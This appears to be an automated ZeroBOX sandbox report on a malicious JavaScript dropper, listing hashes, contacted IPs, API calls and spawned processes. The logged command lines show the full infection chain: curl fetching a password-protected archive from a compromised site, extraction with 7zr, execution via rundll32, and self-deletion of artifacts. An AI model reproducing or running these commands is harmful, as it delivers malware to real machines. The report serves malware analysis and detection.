Summary | ZeroBOX

convert-pdf-741.js

Generic Malware UPX Malicious Library Malicious Packer PE File OS Processor Check PE32
Category Machine Started Completed
FILE s1_win7_x6401 Sept. 14, 2023, 1:39 p.m. Sept. 14, 2023, 1:41 p.m.
Size 45.0KB
Type ASCII text
MD5 6fbc1f4557a0eef6e411c33fd88f8339
SHA256 5f59c1530d4f31a05e42f5f00c3054e472bb61c6c34f014415f8dbde89db77f7
CRC32 A18803C2
ssdeep 768:a8hamxyq1YAsuKZNBHUrDHTRab0hGB1Ykk:a8hayvKZNBHU/lab0U5k
Yara None matched

IP Address Status Action
164.124.101.2 Active Moloch
198.57.242.58 Active Moloch
49.12.202.237 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

Flow Issuer Subject Fingerprint
TLS 1.3
192.168.56.101:49173
49.12.202.237:443
None None None
TLS 1.3
192.168.56.101:49169
198.57.242.58:443
None None None

Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: curl
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: https://burpeesconpan.com/wp-content/plugins/jetpack/modules/related-posts/rtl/2575.7z --output "C:\Users\test22\AppData\Local\Temp\saepe.o" --ssl-no-revoke --insecure --location
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

bind

ip_address: 127.0.0.1
socket: 144
port: 0
1 0 0

listen

socket: 144
backlog: 1
1 0 0

accept

ip_address:
socket: 144
port: 0
1 152 0

bind

ip_address: 127.0.0.1
socket: 144
port: 0
1 0 0

listen

socket: 144
backlog: 1
1 0 0

accept

ip_address:
socket: 144
port: 0
1 152 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 1456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007304c000
process_handle: 0xffffffffffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\officia.p.bat
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\officia.p.bat"
cmdline cmd.exe /c ""C:\Users\test22\AppData\Local\Temp\animi.y" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\saepe.o" > "C:\Users\test22\AppData\Local\Temp\officia.preprehenderit.c""
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-741.js"
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\saepe.o"
cmdline "C:\Windows\System32\cmd.exe" /c ""C:\Users\test22\AppData\Local\Temp\animi.y" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\saepe.o" > "C:\Users\test22\AppData\Local\Temp\officia.preprehenderit.c""
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\animi.y"
cmdline cmd.exe /c echo curl https://burpeesconpan.com/wp-content/plugins/jetpack/modules/related-posts/rtl/2575.7z --output "C:\Users\test22\AppData\Local\Temp\saepe.o" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\officia.p.bat"
cmdline "C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\officia.p.bat"
cmdline cmd.exe /c ren "C:\Users\test22\AppData\Local\Temp\officia.preprehenderit.c" "officia.p"
cmdline "C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\officia.preprehenderit.c" "officia.p"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\saepe.o"
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-741.js"
cmdline cmd.exe /c "C:\Users\test22\AppData\Local\Temp\officia.p.bat"
cmdline "C:\Windows\System32\cmd.exe" /c echo curl https://burpeesconpan.com/wp-content/plugins/jetpack/modules/related-posts/rtl/2575.7z --output "C:\Users\test22\AppData\Local\Temp\saepe.o" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\officia.p.bat"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\officia.p.bat"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\animi.y"
file C:\Users\test22\AppData\Local\Temp\animi.y
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-741.js"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c echo curl https://burpeesconpan.com/wp-content/plugins/jetpack/modules/related-posts/rtl/2575.7z --output "C:\Users\test22\AppData\Local\Temp\saepe.o" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\officia.p.bat"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c "C:\Users\test22\AppData\Local\Temp\officia.p.bat"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: curl
parameters: https://www.7-zip.org/a/7zr.exe --output "C:\Users\test22\AppData\Local\Temp\animi.y"
filepath: curl
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c ""C:\Users\test22\AppData\Local\Temp\animi.y" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\saepe.o" > "C:\Users\test22\AppData\Local\Temp\officia.preprehenderit.c""
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c del "C:\Users\test22\AppData\Local\Temp\animi.y"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c del "C:\Users\test22\AppData\Local\Temp\saepe.o"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c ren "C:\Users\test22\AppData\Local\Temp\officia.preprehenderit.c" "officia.p"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: rundll32
parameters: "C:\Users\test22\AppData\Local\Temp\officia.p", scab /k arbalet875
filepath: rundll32
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c del "C:\Users\test22\AppData\Local\Temp\officia.p.bat"
filepath: cmd.exe
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeRestorePrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeSecurityPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeSecurityPrivilege
1 1 0
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\officia.p.bat"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-741.js"
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\saepe.o"
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\animi.y"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\saepe.o"
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-741.js"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\officia.p.bat"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\animi.y"
file C:\Users\test22\AppData\Local\Temp\animi.y
file C:\Users\test22\AppData\Local\Temp\saepe.o
file C:\Users\test22\AppData\Local\Temp\animi.y
parent_process wscript.exe martian_process cmd.exe /c echo curl https://burpeesconpan.com/wp-content/plugins/jetpack/modules/related-posts/rtl/2575.7z --output "C:\Users\test22\AppData\Local\Temp\saepe.o" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\officia.p.bat"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\officia.preprehenderit.c" "officia.p"
parent_process wscript.exe martian_process cmd.exe /c ren "C:\Users\test22\AppData\Local\Temp\officia.preprehenderit.c" "officia.p"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-741.js"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\officia.p.bat"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\officia.p.bat"
parent_process wscript.exe martian_process curl https://www.7-zip.org/a/7zr.exe --output "C:\Users\test22\AppData\Local\Temp\animi.y"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c echo curl https://burpeesconpan.com/wp-content/plugins/jetpack/modules/related-posts/rtl/2575.7z --output "C:\Users\test22\AppData\Local\Temp\saepe.o" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\officia.p.bat"
parent_process wscript.exe martian_process "C:\util\curl\curl.exe" https://www.7-zip.org/a/7zr.exe --output "C:\Users\test22\AppData\Local\Temp\animi.y"
parent_process wscript.exe martian_process "C:\Windows\System32\rundll32.exe" "C:\Users\test22\AppData\Local\Temp\officia.p", scab /k arbalet875
parent_process wscript.exe martian_process cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-741.js"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\saepe.o"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c ""C:\Users\test22\AppData\Local\Temp\animi.y" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\saepe.o" > "C:\Users\test22\AppData\Local\Temp\officia.preprehenderit.c""
parent_process wscript.exe martian_process rundll32 "C:\Users\test22\AppData\Local\Temp\officia.p", scab /k arbalet875
parent_process wscript.exe martian_process cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\saepe.o"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\animi.y"
parent_process wscript.exe martian_process cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\officia.p.bat"
parent_process wscript.exe martian_process cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\animi.y"
parent_process wscript.exe martian_process cmd.exe /c "C:\Users\test22\AppData\Local\Temp\officia.p.bat"
parent_process wscript.exe martian_process cmd.exe /c ""C:\Users\test22\AppData\Local\Temp\animi.y" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\saepe.o" > "C:\Users\test22\AppData\Local\Temp\officia.preprehenderit.c""
file C:\Windows\System32\cmd.exe
file C:\util\curl\curl.exe
file C:\Windows\System32\rundll32.exe